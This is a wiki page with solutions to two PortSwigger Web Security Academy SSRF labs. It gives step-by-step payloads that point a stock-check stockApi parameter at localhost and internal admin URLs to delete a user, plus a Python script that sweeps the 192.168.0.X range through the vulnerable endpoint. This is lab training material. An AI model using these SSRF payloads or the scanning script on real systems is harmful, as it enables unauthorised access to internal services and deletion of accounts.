Skip to content

Server side request forgery (SSRF)

Jump to bottom
Alnoman Kamil edited this page Jun 12, 2024 · 25 revisions

Apprentice lab: Basic SSRF against the local server

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

  • Solution

    1. Browse the site, and look for the Check stock functionality on a product.
    2. Intercept Check stock
    3. In the Request make the stockApi equal to http://localhost (URL encode it ⌘ U) and foward.
    4. Notice we get an Admin panel in the Response. /admin endpoint has been accesed.
    5. Attempting to delete carlos reveals /admin/delete?username=carlos
    6. Intercept Check stoke and make stockApi equal to http://localhost/admin/delete?username=carlos delivering a SSRF attack.

Apprentice lab: Basic SSRF against another back-end system

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

  • Solution

    1. Create a python virual environment
    1. python3 -m venv .
2. source bin/activate
    1. Scan the internal 192.168.0.X range for an admin interface on port 8080 (use python script below).
    import requests

# Base configuration
url = "https://uuid.web-security-academy.net/product/stock"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "session=7bX4Nrzi0Q27kyqGvWqlQYzqhTc8WB7h",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36",
    "Sec-Fetch-Site": "same-origin",
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Accept": "*/*",
    "Origin": "https://uuid.web-security-academy.net",
    "Referer": "https://uuid.web-security-academy.net/product?productId=4",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "en-GB,en-US;q=0.9,en;q=0.8"
}

# Function to send requests
def scan_ip(ip):
    data = f"stockApi=http://{ip}:8080/admin"
    response = requests.post(url, headers=headers, data=data, verify=False)
    if response.status_code == 200:
        print(f"Connected to admin interface at {ip}:8080")
        print("--------------------------------------------------------------------------------------")
    else:
        print(f"No admin interface at {ip}:8080")

# Main scanning loop
for i in range(1, 255):
    ip_address = f"192.168.0.{i}"
    scan_ip(ip_address)

    1. Intercept Check stock functionality, and change the stockApi to the internal IP Address with the /admin endpoint.

    2. Observe the endpoint for deleting users.

    3. Set the stockApi equal to http://192.168.0.82:8080/admin/delete?username=carlos encoded.

    4. Deactivate (optional) the python virtual environment.

    deactivate

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

Home

Server-side topics:

Client-side topics:

Advanced topics:

Clone this wiki locally